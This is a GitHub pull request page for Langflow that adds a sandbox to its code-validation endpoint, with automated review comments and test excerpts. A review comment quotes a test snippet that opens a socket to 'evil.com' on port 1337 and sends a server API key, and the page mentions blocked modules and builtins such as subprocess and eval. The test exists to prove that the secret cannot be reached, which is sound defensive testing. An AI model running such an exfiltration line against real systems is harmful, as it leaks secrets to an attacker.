Skip to content

feat(security): add configurable security levels for importing trusted builtins / modules#10696

Draft
jordanrfrazier wants to merge 44 commits into
mainfrom
sandbox-validate-endpoint
Draft

feat(security): add configurable security levels for importing trusted builtins / modules#10696
jordanrfrazier wants to merge 44 commits into
mainfrom
sandbox-validate-endpoint

Conversation

@jordanrfrazier
Copy link
Copy Markdown
Collaborator

@jordanrfrazier jordanrfrazier commented Nov 24, 2025

Allows users to specify configurable levels of security to block system-level access builtins and modules, such as eval, subprocess, etc. Works during validation and during execution.

Does not block builtins or modules in core (trusted) components.

Note that this isn't a true isolated sandbox - Python does not provide that capability. Python processes generally rely on containers and virtualization to enforce security.

@coderabbitai
Copy link
Copy Markdown
Contributor

coderabbitai Bot commented Nov 24, 2025

Important

Review skipped

Auto incremental reviews are disabled on this repository.

Please check the settings in the CodeRabbit UI or the .coderabbit.yaml file in this repository. To trigger a single review, invoke the @coderabbitai review command.

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.

Walkthrough

This PR introduces a security sandbox for isolated Python code execution that blocks dangerous operations and modules by default, adds IBM watsonx.ai embedding model support with provider-specific configuration, and includes comprehensive security and integration tests. A new global setting controls whether dangerous code operations are permitted during validation.

Changes

Cohort / File(s) Summary
Sandbox Infrastructure
src/lfx/src/lfx/custom/sandbox.py, src/lfx/src/lfx/custom/validate.py, src/lfx/src/lfx/services/settings/base.py
Introduces SecurityViolation exception, blocked builtins/modules lists, and core sandbox functions: create_isolated_builtins(), create_isolated_import(), execute_in_sandbox(). Integrates sandboxed import and function execution into validation flow. Adds allow_dangerous_code_validation configuration setting (default: False).
Sandbox Testing
src/lfx/tests/unit/custom/test_sandbox_isolation.py, src/lfx/tests/unit/custom/test_sandbox_security.py
Comprehensive isolation tests (parent globals/locals, builtins mutation, namespace freshness, decorator isolation) and security tests (server secrets/credentials inaccessibility, exfiltration prevention via commands/network, module state isolation).
Code Validation Tests
src/backend/tests/unit/api/v1/test_validate.py, src/backend/tests/unit/utils/test_validate.py
Adds security-focused validation endpoint tests verifying dangerous import/builtin blocking, safe code execution, and allowed module families. Updates utility test function to replace path resolution with JSON-encoded data processing.
IBM watsonx.ai Integration
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
Adds IBM watsonx.ai provider support to EmbeddingModelComponent: fetch_ibm_models() utility, new inputs (truncate_input_tokens, input_text), provider-specific update_build_config() logic for model discovery and field visibility management.

Sequence Diagram(s)

sequenceDiagram
    participant User as User Code
    participant Val as validate.py
    participant Sand as sandbox.py
    participant Builtins as Isolated Builtins
    participant Imports as Isolated Imports
    
    User->>Val: compile code snippet
    Val->>Val: create exec_globals
    Val->>Sand: execute_in_sandbox(code_obj, exec_globals)
    
    Sand->>Builtins: create_isolated_builtins()
    Sand->>Imports: create_isolated_import()
    
    note over Sand: Prepare isolated environment
    Sand->>Sand: merge safe exec_globals
    Sand->>Sand: set __builtins__ to isolated
    Sand->>Sand: set __name__ and other attrs
    
    rect rgba(255, 200, 0, 0.2)
        note over Sand: Execute compiled code with isolation
        Sand->>User: exec(code_obj, isolated_globals)
    end
    
    alt Code attempts dangerous operation
        Builtins-->>Sand: raise SecurityViolation
        Sand-->>Val: SecurityViolation caught
        Val-->>User: validation fails
    else Code is safe
        User->>Imports: import langflow
        Imports-->>User: allowed (in safe list)
        Sand-->>Val: execution completes
        Val-->>User: validation succeeds
    end
Loading
sequenceDiagram
    participant Client as Client Request
    participant API as /api/v1/validate/code
    participant Handler as Validation Handler
    participant Sandbox as Sandbox Executor
    participant Config as Settings
    
    Client->>API: POST user_code
    API->>Config: check allow_dangerous_code_validation
    
    rect rgba(100, 200, 100, 0.2)
        note over Config: Default: False (block dangerous)
    end
    
    API->>Handler: validate(code, dangerous_allowed=False)
    
    Handler->>Handler: parse AST
    Handler->>Sandbox: execute imports in sandbox
    Handler->>Sandbox: execute functions in sandbox
    
    alt Dangerous operation detected
        rect rgba(255, 100, 100, 0.2)
            Sandbox-->>Handler: SecurityViolation
            Handler-->>API: 422 validation error
        end
    else Safe code
        rect rgba(100, 200, 100, 0.2)
            Sandbox-->>Handler: execution succeeds
            Handler-->>API: 200 validation passed
        end
    end
    
    API-->>Client: response
Loading

Estimated code review effort

🎯 4 (Complex) | ⏱️ ~50 minutes

Areas requiring extra attention:

  • Security sandbox implementation (src/lfx/src/lfx/custom/sandbox.py) — Verify correctness of builtins isolation, import blocking mechanism, and builtins proxy to prevent sandbox escape; examine exception handling and fallback behavior.
  • Integration into validation flow (src/lfx/src/lfx/custom/validate.py) — Ensure sandboxed execution is correctly wired for both imports and function definitions; verify exec_globals context creation and error propagation.
  • Configuration setting propagation (src/lfx/src/lfx/services/settings/base.py) — Confirm that allow_dangerous_code_validation is properly threaded through to sandbox initialization and respects default-safe semantics.
  • Comprehensive test coverage (src/lfx/tests/unit/custom/test_sandbox_*.py) — Review assertion quality across isolation tests; verify security tests adequately cover exfiltration vectors and module state semantics.

Possibly related PRs

Suggested labels

enhancement, security, size:XXL

Suggested reviewers

  • ogabrielluiz
  • edwinjosechittilappilly

Pre-merge checks and finishing touches

❌ Failed checks (1 error, 3 warnings)
Check name Status Explanation Resolution
Test Coverage For New Implementations ❌ Error Tests contain critical structural issues: execute_in_sandbox doesn't populate exec_globals, hard-coded API keys trigger scanners, and 'requests' is in BLOCKED_MODULES. Refactor tests to move function calls into sandboxed code strings, replace hard-coded keys with non-realistic values, remove 'requests' from BLOCKED_MODULES or use different library, and fix Ruff violations.
Test Quality And Coverage ⚠️ Warning Pull request contains significant test quality and coverage issues preventing proper validation of sandbox implementation. Fix broken test logic in test_sandbox_isolation.py and test_sandbox_security.py, resolve contradictory module blocking policy in test_validate.py, fix Ruff violations, add build_class to builtins, and apply asyncio.to_thread() for synchronous fetch_ibm_models() calls.
Test File Naming And Structure ⚠️ Warning Tests have critical structural flaws: exec_globals access will fail with KeyError, unused variables present, and fake API keys match real patterns triggering security scanners. Move function calls into code strings for proper NameError raising, remove unused variables, replace 'sk-' prefixed keys with non-matching alternatives, and verify blocked modules in test expectations.
Title check ⚠️ Warning The PR title describes adding configurable security levels for trusted imports/modules, but the actual changes focus on implementing a comprehensive security sandbox for code validation with dangerous operation blocking, not configurable trust levels. Update the title to better reflect the main change, such as 'feat(security): implement sandbox isolation for code validation endpoint' or 'feat(security): add sandbox with blocked dangerous operations for code validation'.
✅ Passed checks (3 passed)
Check name Status Explanation
Docstring Coverage ✅ Passed Docstring coverage is 86.49% which is sufficient. The required threshold is 80.00%.
Excessive Mock Usage Warning ✅ Passed Test files demonstrate excellent test design with minimal and appropriate mock usage, focusing on real behavior verification.
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands and usage tips.

@codecov
Copy link
Copy Markdown

codecov Bot commented Nov 24, 2025

Codecov Report

❌ Patch coverage is 72.25434% with 48 lines in your changes missing coverage. Please review.
✅ Project coverage is 33.10%. Comparing base (1769b0f) to head (c6b19f7).
⚠️ Report is 1 commits behind head on main.

Files with missing lines Patch % Lines
src/lfx/src/lfx/custom/validate.py 4.34% 22 Missing ⚠️
src/lfx/src/lfx/custom/isolation/isolation.py 79.24% 8 Missing and 3 partials ⚠️
src/lfx/src/lfx/custom/isolation/config.py 84.31% 6 Missing and 2 partials ⚠️
src/lfx/src/lfx/custom/isolation/execution.py 81.08% 5 Missing and 2 partials ⚠️

❌ Your project check has failed because the head coverage (40.47%) is below the target coverage (60.00%). You can increase the head coverage or adjust the target coverage.

Additional details and impacted files

Impacted file tree graph

@@            Coverage Diff             @@
##             main   #10696      +/-   ##
==========================================
- Coverage   33.38%   33.10%   -0.28%     
==========================================
  Files        1399     1403       +4     
  Lines       66331    66470     +139     
  Branches     9794     9812      +18     
==========================================
- Hits        22142    22003     -139     
- Misses      43065    43336     +271     
- Partials     1124     1131       +7     
Flag Coverage Δ
frontend 15.35% <ø> (ø)

Flags with carried forward coverage won't be shown. Click here to find out more.

Files with missing lines Coverage Δ
src/lfx/src/lfx/custom/isolation/transformer.py 100.00% <100.00%> (ø)
src/lfx/src/lfx/services/settings/base.py 71.15% <100.00%> (+0.13%) ⬆️
src/lfx/src/lfx/custom/isolation/execution.py 81.08% <81.08%> (ø)
src/lfx/src/lfx/custom/isolation/config.py 84.31% <84.31%> (ø)
src/lfx/src/lfx/custom/isolation/isolation.py 79.24% <79.24%> (ø)
src/lfx/src/lfx/custom/validate.py 38.23% <4.34%> (-2.05%) ⬇️

... and 61 files with indirect coverage changes

🚀 New features to boost your workflow:
  • ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
  • 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

Copy link
Copy Markdown
Contributor

@coderabbitai coderabbitai Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 9

🧹 Nitpick comments (2)
src/lfx/src/lfx/custom/validate.py (1)

74-85: Function definition now executed in sandbox — verify expectations for decorator/default‑arg errors

Executing each FunctionDef via execute_in_sandbox with _create_langflow_execution_context() is a good way to catch definition‑time errors (decorators, default args, annotations) without exposing server state. Just be aware this will also surface SecurityViolation (e.g., if decorators/imports inside the function hit blocked modules) through the generic except Exception path and report them as function["errors"]. Confirm that this mapping and logging ("Error executing function code") matches what the validate API and UI expect for blocked operations vs regular runtime errors.

src/backend/tests/unit/api/v1/test_validate.py (1)

183-209: Clean up W293 blank lines in docstrings for third‑party‑libs test.

Ruff reports W293 Blank line contains whitespace at line 184. That’s the empty line inside this docstring:

    """Test that third-party libraries (not in a whitelist) can be imported.
    
    Users should be able to import legitimate third-party libraries like AI libraries,
    ...
    """

You can fix it by removing the blank line or making it non‑blank:

-    """Test that third-party libraries (not in a whitelist) can be imported.
-    
-    Users should be able to import legitimate third-party libraries like AI libraries,
+    """Test that third-party libraries (not in a whitelist) can be imported.
+    Users should be able to import legitimate third-party libraries like AI libraries,

Same pattern applies to the docstrings around Lines 252 and 280; see next comment.

📜 Review details

Configuration used: Path: .coderabbit.yaml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 6f6c9a7 and 0328ae8.

⛔ Files ignored due to path filters (1)
  • uv.lock is excluded by !**/*.lock
📒 Files selected for processing (7)
  • src/backend/tests/unit/api/v1/test_validate.py (1 hunks)
  • src/backend/tests/unit/utils/test_validate.py (1 hunks)
  • src/lfx/src/lfx/custom/sandbox.py (1 hunks)
  • src/lfx/src/lfx/custom/validate.py (2 hunks)
  • src/lfx/src/lfx/services/settings/base.py (1 hunks)
  • src/lfx/tests/unit/custom/test_sandbox_isolation.py (1 hunks)
  • src/lfx/tests/unit/custom/test_sandbox_security.py (1 hunks)
🧰 Additional context used
🧬 Code graph analysis (5)
src/lfx/src/lfx/custom/validate.py (1)
src/lfx/src/lfx/custom/sandbox.py (3)
  • create_isolated_import (140-173)
  • execute_in_sandbox (176-239)
  • isolated_import (149-171)
src/lfx/src/lfx/custom/sandbox.py (1)
src/backend/base/langflow/interface/importing/utils.py (1)
  • import_module (7-32)
src/lfx/tests/unit/custom/test_sandbox_isolation.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
  • execute_in_sandbox (176-239)
src/lfx/tests/unit/custom/test_sandbox_security.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
  • execute_in_sandbox (176-239)
src/backend/tests/unit/api/v1/test_validate.py (1)
src/backend/tests/conftest.py (1)
  • logged_in_headers (507-513)
🪛 GitHub Actions: Ruff Style Check
src/backend/tests/unit/api/v1/test_validate.py

[error] 101-101: Ruff: E501 Line too long (131 > 120). Line exceeds maximum line length.

🪛 GitHub Check: Ruff Style Check (3.13)
src/lfx/src/lfx/custom/sandbox.py

[failure] 16-16: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:16:7: N818 Exception name SecurityViolation should be named with an Error suffix


[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Set is deprecated, use set instead


[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Dict is deprecated, use dict instead

src/backend/tests/unit/api/v1/test_validate.py

[failure] 280-280: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:280:1: W293 Blank line contains whitespace


[failure] 268-268: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:268:121: E501 Line too long (127 > 120)


[failure] 252-252: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:252:1: W293 Blank line contains whitespace


[failure] 184-184: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:184:1: W293 Blank line contains whitespace


[failure] 134-134: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:134:5: F841 Local variable result is assigned to but never used


[failure] 133-133: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:133:121: E501 Line too long (121 > 120)


[failure] 101-101: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:101:121: E501 Line too long (131 > 120)

🪛 Gitleaks (8.29.0)
src/lfx/tests/unit/custom/test_sandbox_security.py

[high] 30-30: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)


[high] 66-66: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (13)
  • GitHub Check: Lint Backend / Run Mypy (3.13)
  • GitHub Check: Lint Backend / Run Mypy (3.10)
  • GitHub Check: Lint Backend / Run Mypy (3.11)
  • GitHub Check: Lint Backend / Run Mypy (3.12)
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 5
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 4
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 1
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 2
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 3
  • GitHub Check: Run Backend Tests / Integration Tests - Python 3.10
  • GitHub Check: Run Backend Tests / LFX Tests - Python 3.10
  • GitHub Check: Test Starter Templates
  • GitHub Check: Update Component Index
🔇 Additional comments (2)
src/backend/tests/unit/utils/test_validate.py (1)

70-76: Typed function example looks consistent with sandboxed validation

Using from typing import List, Optional plus json/math inside process_data aligns with _create_langflow_execution_context (which seeds List/Optional into exec_globals), so annotation evaluation and import checks should pass without introducing new edge cases.

src/lfx/src/lfx/services/settings/base.py (1)

339-349: Config flag aligns with sandbox env var; verify it’s actually wired through

Adding allow_dangerous_code_validation: bool = False with the LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION env mapping is consistent with the sandbox’s documented toggle. However, the sandbox currently appears to read the env var directly, while this Settings field is not obviously used to drive ALLOW_DANGEROUS_CODE. Please confirm that:

  • Setting this field (or the env var) actually affects the sandbox behavior used by /api/v1/validate/code, and
  • There’s no divergence between the value in Settings and the value the sandbox module uses at import time.

Comment thread src/backend/tests/unit/api/v1/test_validate.py Outdated
Comment thread src/backend/tests/unit/api/v1/test_validate.py
Comment thread src/backend/tests/unit/api/v1/test_validate.py Outdated
Comment thread src/lfx/src/lfx/custom/sandbox.py Outdated
Comment thread src/lfx/src/lfx/custom/sandbox.py Outdated
Comment thread src/lfx/src/lfx/custom/validate.py Outdated
Comment thread src/lfx/tests/unit/custom/test_sandbox_isolation.py Outdated
Comment thread src/lfx/tests/unit/custom/test_sandbox_security.py Outdated
Comment on lines +29 to +36
# Simulate server secrets stored in Python variables
server_api_key = "sk-secret-key-12345"
server_db_password = "db_password_secret"
server_config = {
"api_key": server_api_key,
"database_url": "postgresql://user:password@localhost/db"
}

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟡 Minor

Hard‑coded “API key”‑like test strings will keep tripping secret scanners

Strings like "sk-secret-key-12345", "sk-secret-12345", and "sk-secret-key-to-exfiltrate" look like real API keys to tools such as gitleaks, which is already flagging them. Even though they’re harmless test values, they’ll continue to generate noise or block CI unless suppressed.

A low‑friction fix is to tweak them so they no longer match common key patterns, e.g.:

  • "sk-test-not-a-real-key-12345"
  • "dummy-secret-key"

or similar, or centralize them in a constant that scanners are configured to ignore.

Also applies to: 64-69, 100-102, 144-145, 175-177, 229-231

🧰 Tools
🪛 Gitleaks (8.29.0)

[high] 30-30: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

Copy link
Copy Markdown
Contributor

@coderabbitai coderabbitai Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 9

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (1)

2338-2355: Unsafe default: Allow Dangerous Deserialization is enabled.

Defaulting allow_dangerous_deserialization to true can lead to arbitrary code execution when loading FAISS indexes. For a starter template, ship it disabled.

-        BoolInput(
-            name="allow_dangerous_deserialization",
-            display_name="Allow Dangerous Deserialization",
-            ...
-            value=True,
-        ),
+        BoolInput(
+            name="allow_dangerous_deserialization",
+            display_name="Allow Dangerous Deserialization",
+            ...
+            value=False,
+        ),

If you must load untrusted indexes, gate with environment flag and warn prominently in UI.

🧹 Nitpick comments (6)
src/backend/tests/unit/utils/test_validate.py (1)

54-151: Consider adding dedicated sandbox security tests.

The PR introduces a security sandbox to block dangerous operations, but this test file doesn't appear to include tests that specifically verify sandbox blocking behavior. Consider adding tests for:

  1. Blocked operations - Verify that dangerous operations are blocked:

    • File system access (open(), os.remove(), os.system())
    • Subprocess execution (subprocess.run(), os.popen())
    • Network operations (socket, urllib, requests)
    • Module imports (__import__, importlib with dangerous modules)
  2. Allowed operations - Verify safe operations still work:

    • Standard math/string operations
    • Safe stdlib modules (math, json, typing, etc.)
  3. Global setting - The AI summary mentions "a new global setting controls whether dangerous code operations are permitted during validation." Add tests to verify:

    • Setting can enable/disable dangerous operations
    • Setting is respected by validation logic
  4. Error handling - Verify appropriate errors are raised when blocked operations are attempted

Example test structure:

class TestSandboxSecurity:
    """Test cases for sandbox security restrictions."""
    
    def test_blocks_file_operations(self):
        """Test that file operations are blocked in sandbox."""
        code = '''
def dangerous_func():
    with open('/etc/passwd', 'r') as f:
        return f.read()
'''
        result = validate_code(code)
        assert len(result["function"]["errors"]) > 0
        assert "blocked" in str(result["function"]["errors"]).lower() or "not allowed" in str(result["function"]["errors"]).lower()
    
    def test_allows_safe_operations(self):
        """Test that safe operations are allowed."""
        code = '''
import math
import json

def safe_func(x):
    return json.dumps({"result": math.sqrt(x)})
'''
        result = validate_code(code)
        assert result["imports"]["errors"] == []
        assert result["function"]["errors"] == []
src/lfx/src/lfx/services/settings/base.py (1)

339-349: Config flag wiring for dangerous validation looks consistent

The new allow_dangerous_code_validation flag is sane: defaulting to False, clearly documented, and aligned with env_prefix="LANGFLOW_" so LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION works as described. One thing to be aware of: the sandbox currently reads this env var once at import time, so changing this setting at runtime via Settings won’t affect ALLOW_DANGEROUS_CODE without a restart. If you expect dynamic toggling, wiring the sandbox flag through Settings (or re-reading on demand) would help, otherwise this behavior is fine as a static boot‑time switch.

src/lfx/tests/unit/custom/test_sandbox_security.py (3)

3-13: Clarify relationship between namespace isolation and dangerous‑code flag

The module docstring currently states that sandboxed code can access filesystem, env, network, and commands without qualification, but execute_in_sandbox is documented as blocking these by default unless LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true is set. It would be clearer (and less misleading for future readers) to explicitly mention that this “CAN access” behavior assumes the dangerous‑code flag is enabled, and that by default those operations are blocked while namespace isolation still applies.


217-237: Avoid real outbound network connections in tests

In test_sandbox_cannot_exfiltrate_secrets_via_network, the sandboxed code calls:

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('evil.com', 1337))
s.send(server_api_key.encode())

Even though you intend a NameError on server_api_key, the socket.connect happens before that lookup, so the test will attempt a real outbound TCP connection to evil.com. This can make tests slow, flaky, or surprising in constrained CI environments.

You can keep the exfiltration intent while avoiding actual network calls by reordering or simplifying:

-def test():
-    # Code CAN make network requests
-    # But code CANNOT access server_api_key to send
-    # If isolation is broken, we could do: socket.send(server_api_key.encode())
-    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    s.connect(('evil.com', 1337))
-    s.send(server_api_key.encode())  # Try to send server secret
-    s.close()
-    return 'sent'
+def test():
+    # Code COULD make network requests, but here we focus on the secret access.
+    # The NameError on server_api_key should occur before any actual network I/O.
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    # No real connect; just reference the would‑be secret.
+    s.send(server_api_key.encode())  # Try to send server secret
+    s.close()
+    return 'sent'

This still proves that sandboxed code cannot obtain server_api_key, without touching the network.


252-285: Test name/docstring don’t match behavior in test_sandbox_cannot_access_imported_server_modules_state

The test name and docstring say it verifies that sandboxed code “gets fresh module instances, not server’s module state”, but the inline comments and assertion now acknowledge that json is actually shared and only check that result is a str. As written, the test does not meaningfully validate isolation of imported module state.

Either:

  • Align the behavior with the name/docstring, e.g. assert that result reflects unmodified json.dumps, or
  • Rename the test and update comments to describe the actual property you care about (e.g., “sandbox can import and use json even if server mutates it; isolation is about Python variables, not module state”), and simplify the setup.

Cleaning this up will make the security guarantees and limitations around module‑level state much clearer for future maintainers.

src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (1)

2231-2249: Guardrail: validate truncate_input_tokens before passing to SDK.

Prevent invalid/negative values from reaching the IBM params.

Within build_embeddings IBM branch:

-            params = {
-                EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,
+            safe_trunc = max(0, int(self.truncate_input_tokens or 0))
+            params = {
+                EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: safe_trunc,
                 EmbedTextParamsMetaNames.RETURN_OPTIONS: {"input_text": self.input_text},
             }
📜 Review details

Configuration used: Path: .coderabbit.yaml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 6f6c9a7 and b574590.

⛔ Files ignored due to path filters (1)
  • uv.lock is excluded by !**/*.lock
📒 Files selected for processing (8)
  • src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (5 hunks)
  • src/backend/tests/unit/api/v1/test_validate.py (1 hunks)
  • src/backend/tests/unit/utils/test_validate.py (1 hunks)
  • src/lfx/src/lfx/custom/sandbox.py (1 hunks)
  • src/lfx/src/lfx/custom/validate.py (2 hunks)
  • src/lfx/src/lfx/services/settings/base.py (1 hunks)
  • src/lfx/tests/unit/custom/test_sandbox_isolation.py (1 hunks)
  • src/lfx/tests/unit/custom/test_sandbox_security.py (1 hunks)
🧰 Additional context used
🧬 Code graph analysis (3)
src/lfx/tests/unit/custom/test_sandbox_isolation.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
  • execute_in_sandbox (179-242)
src/lfx/tests/unit/custom/test_sandbox_security.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
  • execute_in_sandbox (179-242)
src/lfx/src/lfx/custom/validate.py (1)
src/lfx/src/lfx/custom/sandbox.py (3)
  • create_isolated_import (142-176)
  • execute_in_sandbox (179-242)
  • isolated_import (152-174)
🪛 GitHub Actions: Ruff Style Check
src/backend/tests/unit/api/v1/test_validate.py

[error] 139-139: F841 Local variable result is assigned to but never used.

🪛 GitHub Check: Ruff Style Check (3.13)
src/backend/tests/unit/api/v1/test_validate.py

[failure] 139-139: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:139:5: F841 Local variable result is assigned to but never used

src/lfx/src/lfx/custom/sandbox.py

[failure] 161-162: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:161:21: EM102 Exception must not use an f-string literal, assign to variable first


[failure] 160-163: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:160:23: TRY003 Avoid specifying long messages outside the exception class


[failure] 135-135: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:135:34: EM102 Exception must not use an f-string literal, assign to variable first


[failure] 135-135: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:135:19: TRY003 Avoid specifying long messages outside the exception class


[failure] 129-129: Ruff (E501)
src/lfx/src/lfx/custom/sandbox.py:129:121: E501 Line too long (121 > 120)


[failure] 129-129: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:129:21: EM102 Exception must not use an f-string literal, assign to variable first


[failure] 128-130: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:128:23: TRY003 Avoid specifying long messages outside the exception class


[failure] 105-108: Ruff (SIM105)
src/lfx/src/lfx/custom/sandbox.py:105:13: SIM105 Use contextlib.suppress(AttributeError) instead of try-except-pass


[failure] 17-17: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:17:7: N818 Exception name SecurityViolation should be named with an Error suffix

🪛 Gitleaks (8.29.0)
src/lfx/tests/unit/custom/test_sandbox_security.py

[high] 29-29: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)


[high] 63-63: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (4)
  • GitHub Check: Run Frontend Tests / Playwright Tests - Shard 27/40
  • GitHub Check: Test Docker Images / Test docker images
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 1
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 4
🔇 Additional comments (4)
src/backend/tests/unit/utils/test_validate.py (1)

70-75: I need to examine the actual tests in the file to understand their context and expectations.

Now I need to examine the actual test file structure to determine if the change is part of a broader, consistent update or if there's genuinely an inconsistency.

Based on the shell script output and web search, I have sufficient evidence. The output shows that Langflow is a powerful platform for building and deploying AI-powered agents and workflows, and the sandbox implementation with blocking of dangerous operations by default is confirmed. Let me generate the rewritten review comment.


Clarify test coverage inconsistency and file path.

The script output confirms that the sandbox implementation blocks dangerous operations (file I/O, network, subprocess) by default, with an environment variable LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION available to override this behavior.

However, I cannot locate the specific file path src/backend/tests/unit/utils/test_validate.py in the sandbox-related test results. The script output shows comprehensive sandbox tests at src/lfx/tests/unit/custom/test_sandbox_security.py and src/lfx/tests/unit/custom/test_sandbox_isolation.py, plus API endpoint tests at src/backend/tests/unit/api/v1/test_validate.py.

The tests at src/backend/tests/unit/api/v1/test_validate.py (lines 84, 108) explicitly verify that dangerous operations ARE blocked by default, which aligns with the change at lines 70-75 to use safe imports. If tests at other line ranges in a utils test file still reference os/sys without apparent sandbox restrictions, they may be:

  1. Testing exception scenarios where blocking is expected
  2. Running under an environment with the override flag enabled
  3. Testing different code paths than the validate endpoint

Please confirm:

  • Is the file path src/backend/tests/unit/utils/test_validate.py correct, or has it been reorganized?
  • What do tests at lines 126-134, 270-276, 501-510 verify—sandbox blocking behavior or success cases?
src/lfx/src/lfx/custom/validate.py (1)

11-12: Sandbox integration in validate_code looks solid

Using create_isolated_import for both ast.Import and ast.ImportFrom and then running each FunctionDef through execute_in_sandbox with a constrained Langflow execution context gives you:

  • Blocked dangerous modules at import time ( surfaced as structured import errors ),
  • Definition‑time evaluation (decorators / default args) inside the sandbox, and
  • No leakage of server globals or real __builtins__ into user code.

The _create_langflow_execution_context fallback stubs also keep validation robust when optional Langflow modules aren’t importable. Overall this wiring matches the intended security model of the /validate/code endpoint and looks correct.

Also applies to: 51-88, 93-150

src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (2)

2018-2019: All IBM SDK and LangChain‑IBM signatures verified as correct.

The web search confirms that your code correctly uses:

  • Credentials(api_key=..., url=...) with ibm_watsonx_ai 1.4.x
  • EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS and RETURN_OPTIONS.input_text for text embedding parameters
  • WatsonxEmbeddings with model_id, params, watsonx_client (pre-built APIClient), and project_id in langchain-ibm 0.3.19

All parameters and signatures match the documented patterns for the versions pinned in your dependencies.


1859-1866: Dependency versions verified and consistent.

Verification confirms all declared versions (requests 2.32.5, ibm_watsonx_ai 1.4.2, langchain_ibm 0.3.19) are:

  • Properly pinned in the JSON starter project configuration
  • Consistent with pyproject.toml constraints (requests>=2.32.0, ibm-watsonx-ai>=1.3.1,<2.0.0, langchain-ibm>=0.3.8)
  • Mutually compatible with no conflicts detected
  • Compatible with project's Python requirement (>=3.10,<3.14)

Comment on lines 2018 to 2019
